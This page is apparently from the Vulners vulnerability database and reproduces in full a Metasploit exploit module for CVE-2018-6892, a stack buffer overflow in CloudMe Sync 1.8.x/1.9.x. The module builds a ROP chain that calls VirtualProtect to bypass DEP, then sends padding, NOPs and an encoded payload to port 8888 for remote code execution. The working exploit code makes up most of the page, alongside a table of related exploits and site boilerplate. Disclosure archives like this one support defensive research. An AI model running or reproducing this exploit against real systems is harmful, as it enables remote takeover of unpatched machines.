Vulners
Lucene search
Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)
| Reporter | Title | Published | Views | Family All 35 |
|---|---|---|---|---|
 | CloudMe Sync 1.10.9 Remote Buffer Overflow Vulnerability | 12 Feb 201800:00 | – | zdt |
| CloudMe Sync 1.10.9 Buffer Overflow Exploit | 23 Feb 201800:00 | – | zdt |
| CloudMe Sync 1.9.2 Remote Buffer Overflow Exploit | 6 Mar 201800:00 | – | zdt |
| Cloudme 1.9 - Buffer Overflow (DEP) Учздщше | 14 Aug 201800:00 | – | zdt |
| CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt Exploit | 22 Jan 201900:00 | – | zdt |
| CloudMe Sync 1.11.2 Buffer Overflow - WoW64 - (DEP Bypass) Exploit | 28 Jan 201900:00 | – | zdt |
| CloudMe 1.11.2 SEH Buffer Overflow Exploit | 3 Aug 202000:00 | – | zdt |
| CloudMe 1.11.2 - Buffer Overflow ROP (DEP,ASLR) Exploit (2) | 29 Sep 202000:00 | – | zdt |
 | CVE-2018-6892 | 13 Feb 201800:00 | – | circl |
 | CloudMe Buffer Overflow Vulnerability | 12 Feb 201800:00 | – | cnvd |
10
# Exploit Title: Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)
# Date: 2018-08-13
# Exploit Author: Raymond Wellnitz
# Vendor Homepage: https://www.cloudme.com
# Version: 1.8.x/1.9.x
# Tested on: Windows 7 x64
# CVE : 2018-6892
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Cloudme v1.8.x/v1.9.x Buffer Overflow with DEP-Bypass',
'Description' => %q{
This module exploits a stack buffer overflow in Cloudme v1.8.x/v1.9.x.
},
'Author' => [ 'Raymond Wellnitz' ],
'References' =>
[
[ 'CVE', 'CVE-2018-6892' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Platform' => 'win',
'Privileged' => true,
'Payload' =>
{
'Space' => 600,
'BadChars' => "\x00"
},
'Targets' =>
[
[ 'Windows x86_32/64', { 'Ret' => 0x6cfa88a2 } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => '11.02.2018'))
register_options([ Opt::RPORT(8888) ])
end
def create_rop_chain()
rop_gadgets = [
0x6cf98182, # POP EAX # RETN [icuin49.dll]
0x68c848d8, # ptr to &VirtualProtect() [IAT Qt5Core.dll]
0x61b4d226, # MOV EAX,DWORD PTR DS:[EAX] # RETN [Qt5Gui.dll]
0x668d8261, # XCHG EAX,ESI # RETN [libGLESv2.dll]
0x68a5c297, # POP EBP # RETN [Qt5Core.dll]
0x688dd45d, # & JMP ESP [Qt5Core.dll]
0x68abe868, # POP EAX # RETN [Qt5Core.dll]
0xfffffdff, # 201
0x1004b263, # NEG EAX # RETN [LIBEAY32.dll]
0x689687d2, # XCHG EAX,EBX # RETN
0x68abe868, # POP EAX # RETN [Qt5Core.dll]
0xffffffc0, # 40
0x1004b263, # NEG EAX # RETN [LIBEAY32.dll]
0x6751d479, # XCHG EAX,EDX # RETN [icuuc49.dll]
0x100010c7, # POP ECX # RETN [LIBEAY32.dll]
0x6494ea0a, # &Writable location [libwinpthread-1.dll]
0x68a49534, # POP EDI # RETN [Qt5Core.dll]
0x1008df82, # RETN (ROP NOP) [LIBEAY32.dll]
0x68ad025b, # POP EAX # RETN [Qt5Core.dll]
0x90909090, # NOPS
0x6759bdb4, # PUSHAD # RETN [icuuc49.dll]
].flatten.pack("V*")
return rop_gadgets
end
def exploit
connect
sploit = rand_text_alpha_upper(1036)
sploit << create_rop_chain()
sploit << make_nops(30)
sploit << payload.encoded
print_status("Trying target #{target.name}...")
sock.put(sploit + "\r\n\r\n")
handler
disconnect
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Aug 2018 00:00Current
9High risk
Vulners AI Score9
CVSS 27.5
CVSS 39.8
EPSS0.89668